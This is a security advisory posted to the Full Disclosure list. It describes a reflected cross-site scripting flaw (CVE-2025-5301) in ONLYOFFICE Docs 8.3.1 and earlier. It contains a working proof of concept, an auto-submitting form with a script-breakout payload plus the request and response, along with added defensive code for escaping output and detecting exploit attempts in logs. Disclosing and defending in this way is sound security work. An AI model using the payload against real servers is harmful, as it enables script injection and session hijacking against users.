Message-ID: <32b2fead-09b4-4d29-b3f2-30d1920c7aa3@sec-consult.com>
Date: Thu, 12 Jun 2025 07:39:37 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
 <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20250612-0 :: Reflected Cross-Site Scripting in
 ONLYOFFICE Docs (DocumentServer)

SEC Consult Vulnerability Lab Security Advisory < 20250612-0 >
=======================================================================
               title: Reflected Cross-Site Scripting
             product: ONLYOFFICE Docs (DocumentServer)
  vulnerable version: <=8.3.1
       fixed version: 8.3.2 or higher
          CVE number: CVE-2025-5301
              impact: Medium
            homepage: https://www.onlyoffice.com/
                      https://github.com/ONLYOFFICE/DocumentServer/
               found: 2025-02-14
                  by: Max Rull
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"ONLYOFFICE Docs* is a free collaborative online office suite comprising
viewers and editors for texts, spreadsheets and presentations, forms and
PDF, fully compatible with Office Open XML formats:
.docx, .xlsx, .pptx and enabling collaborative editing in real time.
ONLYOFFICE Docs can be used as a part of ONLYOFFICE Workspace or with
third-party sync&share solutions (e.g. Nextcloud, ownCloud, Seafile) to
enable collaborative editing within their interface. It has three editions
- Community, Enterprise, and Developer.
* Starting from version 6.0, Document Server is distributed under a
new name - ONLYOFFICE Docs."

Source: https://github.com/ONLYOFFICE/DocumentServer


Business recommendation:
------------------------
The vendor provides a patched version v8.3.2 (or higher) which should be
installed immediately.

SEC Consult highly recommends performing a thorough security review of the
product, conducted by security professionals, to identify and resolve potential
further security issues.


Vulnerability overview/description:
-----------------------------------
1) Reflected XSS via arbitrary query parameters (CVE-2025-5301)
A reflected XSS vulnerability exists in the /hosting/wopi/:documentType/:mode
endpoint because user-controlled query parameters are embedded into the HTML
response without sanitization or output encoding. An attacker can inject
JavaScript via a crafted HTTP POST request; the injected value is reflected
into an inline script block of the server's HTML response.

Technical flow:
- The Express.js handler (wopiClient.getEditorHtml) passes the raw query
   parameters (req.query) into the rendering context without sanitization.
   Code reference (server.js line 283):
   https://github.com/ONLYOFFICE/server/blob/02ae05c/DocService/sources/server.js#L283

- The parameters are read directly from req.query without any validation
   (wopiClient.js line 573):
   https://github.com/ONLYOFFICE/server/blob/02ae05c/DocService/sources/wopiClient.js#L573

- The editor-wopi.ejs template (line 292) embeds them inside an inline
   script block using the unescaped EJS output tag:
   var queryParams = <%- JSON.stringify(queryParams) %>;
   JSON.stringify escapes quotes and control characters but leaves "<", ">"
   and "/" untouched, so a parameter value (or name) containing "</script>"
   terminates the script element as far as the HTML parser is concerned, and
   any "<script>" tag that follows is parsed and executed as a new script.
   Code reference (editor-wopi.ejs line 292):
   https://github.com/ONLYOFFICE/web-apps/blob/090ef83/apps/api/wopi/editor-wopi.ejs#L292

Impact:
- Execution of attacker-controlled scripts in victim's browser
- Session hijacking, phishing attacks, or UI manipulation
- Risks compounded by missing CSP/X-Frame-Options headers
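The following is an added example and is not ONLYOFFICE's code or the vendor's
8.3.2 patch. It reproduces the effect of the template line described above with
a hypothetical renderPage() stand-in for editor-wopi.ejs, shows why the HTML
parser splits the inline script at "</script" regardless of JavaScript syntax,
and contrasts it with one hardening approach: escaping "<", ">" and "&" as JSON
\u sequences before emitting the value into a script block. The attack input is
the advisory's own payload; everything else (function names, page skeleton) is
an assumption made for the example.

```javascript
// Added example, not ONLYOFFICE's code: why
//   var queryParams = <%- JSON.stringify(queryParams) %>;
// is exploitable, and one way to serialise untrusted JSON into an inline
// <script> safely. renderPage() is a hypothetical stand-in for the EJS
// template; the vendor's actual 8.3.2 fix is not reproduced here.

// What the vulnerable template does: EJS "<%-" emits the string unescaped,
// and JSON.stringify leaves '<', '>' and '&' untouched.
function stringifyVulnerable(params) {
  return JSON.stringify(params);
}

// Hardened variant: replace every character that matters to the HTML parser
// with its JSON \u escape. The JavaScript engine decodes the escape back to
// the original character, so the value is unchanged, but the HTML tokenizer
// never sees "</script". U+2028/U+2029 are escaped because they are JS line
// terminators and would break the string literal in older engines.
function stringifyForInlineScript(params) {
  return JSON.stringify(params)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Minimal page in the shape of the advisory's response body.
function renderPage(params, serialise) {
  return [
    '<!DOCTYPE html>',
    '<html><head>',
    '<script>',
    'var queryParams = ' + serialise(params) + ';',
    '</script>',
    '</head><body></body></html>',
  ].join('\n');
}

// Approximates the HTML tokenizer's "script data" state: a script element
// ends at the first case-insensitive "</script", whatever the JavaScript
// inside looks like. Returns the body of every script element in order.
function scriptElementBodies(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Evaluates one script body as the browser would and returns queryParams,
// or null if the body is not valid JavaScript (the truncated vulnerable one).
function evalQueryParams(scriptBody) {
  try {
    return new Function(scriptBody + '\nreturn queryParams;')();
  } catch (e) {
    return null;
  }
}

// Constructed input: the advisory's payload in the "dchat" parameter.
const ATTACK_PARAMS = { dchat: "asdasd</script><script>alert('XSS')</script>" };

function demo() {
  const vulnerable = scriptElementBodies(renderPage(ATTACK_PARAMS, stringifyVulnerable));
  const hardened = scriptElementBodies(renderPage(ATTACK_PARAMS, stringifyForInlineScript));
  return {
    vulnerableScriptCount: vulnerable.length,          // 2: the injected <script> became its own element
    injectedScript: vulnerable[1],                      // "alert('XSS')"
    hardenedScriptCount: hardened.length,               // 1: a single, intact script element
    hardenedValue: evalQueryParams(hardened[0]).dchat,  // the original string, unchanged for JS
  };
}

console.log(demo());
```

The point the example makes is that the script element boundary is decided by
the HTML parser before the JavaScript engine ever runs, so JSON validity buys
nothing; escaping at the HTML level (or moving the data into a JSON
<script type="application/json"> element that is read with JSON.parse, with the
same escaping) is what prevents the breakout. A Content-Security-Policy without
'unsafe-inline' would additionally stop the injected inline script from running.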


Proof of concept:
-----------------
1) Reflected XSS via arbitrary query parameters (CVE-2025-5301)
To demonstrate the vulnerability, it is sufficient to open the following
HTML document in a browser:

```
<html>
  <body>
  <form action="https://one.office.example.com/hosting/wopi/word/edit?dchat=asdasd</script><script>alert('XSS')</script>" method="POST">
  <input type="submit" value="Submit request" />
  </form>
  <script>
  history.pushState('', '', '/');
  document.forms[0].submit();
  </script>
  </body>
</html>
```

When the HTML document is opened, the browser automatically issues an HTTP POST
request to the ONLYOFFICE Docs server at one.office.example.com. Because the
endpoint requires no authentication and has neither an anti-CSRF mechanism nor
a CSP, the browser navigates to the response and executes the reflected
JavaScript. Since the content of any query parameter is reflected, the name
"dchat" is arbitrary; the payload could be placed in any parameter. The leading
"</script>" in the payload closes the inline script element for the HTML parser,
so the following "<script>alert('XSS')</script>" is parsed as a new script
element and executed regardless of the surrounding JavaScript syntax.

Opening the HTML document submits the form and sends the following request:
```
POST /hosting/wopi/word/edit?dchat=asdasd</script><script>alert('XSS')</script> HTTP/1.1
Host: one.office.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```

The server responds with the following HTML document:
```
HTTP/2 200 OK
Date: Fri, 14 Feb 2025 14:43:44 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Etag: W/"6716-b+9JJ5PtBd9kmLY/ZdhVwyGtBc"
Strict-Transport-Security: max-age=31536000; includeSubDomains

<!DOCTYPE html>
<html>
<head runat="server">
[...]
var queryParams = {"dchat":"asdasd</script><script>alert('XSS')</script>"};
[...]
</head>
<body>
[...]
</body>
</html>
```

When the response is rendered in the victim's browser, the injected
JavaScript payload (`alert('XSS')`) is executed.

<xss_poc.png>
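As an added example that is not part of the advisory, the following check scans
web-server access logs for attempts to exploit this endpoint, which an operator
who patched late may want before closing the incident. The log lines are
constructed for the example in combined log format (parameter names other than
"dchat" are illustrative, not the endpoint's real ones), and the detector decodes
each query component exactly once, as Express/qs does, so that it flags what the
server would actually have reflected.

```javascript
// Added example, not part of the advisory: retrospective access-log check for
// exploitation attempts against /hosting/wopi/ (CVE-2025-5301).
// The log lines below are constructed; parameter names are illustrative.

// One combined-log-format line: client IP, timestamp, method, URL, status.
const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})/;

// The reflected value breaks out of the inline script only if it carries a
// script tag boundary, so that is what we look for after decoding.
const SCRIPT_TAG = /<\/?script\b/i;

// Decode a query component once, as Express/qs does ('+' is a space, then
// percent-decoding). Malformed sequences are kept verbatim instead of throwing.
function decodeOnce(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, ' '));
  } catch (e) {
    return s;
  }
}

// Split "a=1&b=2" into [[key, value], ...], decoding both sides: the
// template reflects parameter names as well as values.
function parseQuery(query) {
  return query.split('&').filter(Boolean).map((pair) => {
    const i = pair.indexOf('=');
    return i < 0
      ? [decodeOnce(pair), '']
      : [decodeOnce(pair.slice(0, i)), decodeOnce(pair.slice(i + 1))];
  });
}

// Returns one finding per suspicious parameter on a /hosting/wopi/ request.
function findWopiXssAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    const m = LOG_LINE.exec(line);
    if (!m) continue;
    const [, ip, time, method, url, status] = m;
    const q = url.indexOf('?');
    const path = q < 0 ? url : url.slice(0, q);
    if (q < 0 || !path.startsWith('/hosting/wopi/')) continue;
    for (const [key, value] of parseQuery(url.slice(q + 1))) {
      if (SCRIPT_TAG.test(key) || SCRIPT_TAG.test(value)) {
        hits.push({ ip, time, method, path, status: Number(status), param: key, value });
      }
    }
  }
  return hits;
}

// Constructed sample: one real attempt (percent-encoded as a browser sends the
// advisory's PoC), one benign editor request, one double-encoded probe that the
// server would reflect harmlessly as the literal "%3Cscript%3E", and an
// unrelated request.
const SAMPLE_LOG = [
  '203.0.113.7 - - [14/Feb/2025:14:43:44 +0000] "POST /hosting/wopi/word/edit?dchat=asdasd%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 26390 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [14/Feb/2025:14:50:01 +0000] "GET /hosting/wopi/cell/view?lang=en HTTP/1.1" 200 26390 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [14/Feb/2025:14:51:12 +0000] "POST /hosting/wopi/slide/edit?x=%253Cscript%253E HTTP/1.1" 200 26390 "-" "curl/8.5.0"',
  '192.0.2.4 - - [14/Feb/2025:14:52:30 +0000] "GET /healthcheck HTTP/1.1" 200 4 "-" "kube-probe/1.29"',
];

console.log(findWopiXssAttempts(SAMPLE_LOG));
```

Decoding once is deliberate: a second pass would surface the double-encoded
probe, which the server reflects as "%3Cscript%3E" and which therefore does not
execute against this bug. Treat such lines as reconnaissance rather than as
evidence of successful exploitation, and remember that a reflected XSS is only
exploited when a victim's browser renders the response, which the server log
alone cannot tell you.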


Vulnerable / tested versions:
-----------------------------
The following version has been tested and confirmed to be vulnerable:
* ONLYOFFICE DocumentServer 8.3.1 (latest release at the time of testing)

Release details: https://github.com/ONLYOFFICE/DocumentServer/releases/tag/v8.3.1


Vendor contact timeline:
------------------------
2025-03-06: Contacting vendor through marketing@...yoffice.com (to request
             HackerOne access according to ONLYOFFICE blog)
2025-03-08: Resending initial contact email to security@...yoffice.com as well,
             preferring email contact instead of HackerOne.
2025-03-10: Vendor invites us to bounty program. We follow up regarding HackerOne
             policies.
2025-03-14: Submitting advisory via HackerOne.
2025-03-27: Vendor responds that they are already working on it and will keep us
             informed. A second message mentions that a fix has been committed to
             the version 8.3.2 branch.
2025-03-27: Verified that the patch fixes the issue.
2025-03-31: Asking vendor to schedule the release of the advisory and who will
             assign CVE number.
2025-04-04: Vendor tells us we can assign a CVE and closes the ticket.
2025-06-12: Public release of security advisory.


Solution:
---------
The vendor provides a patched version v8.3.2 (or higher) which can be downloaded
from:
https://github.com/ONLYOFFICE/DocumentServer/


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
X: https://x.com/sec_consult

EOF M. Rull / @2025

Download attachment "xss_poc.png" of type "image/png" (276725 bytes)

Download attachment "smime.p7s" of type "application/pkcs7-signature" (4438 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
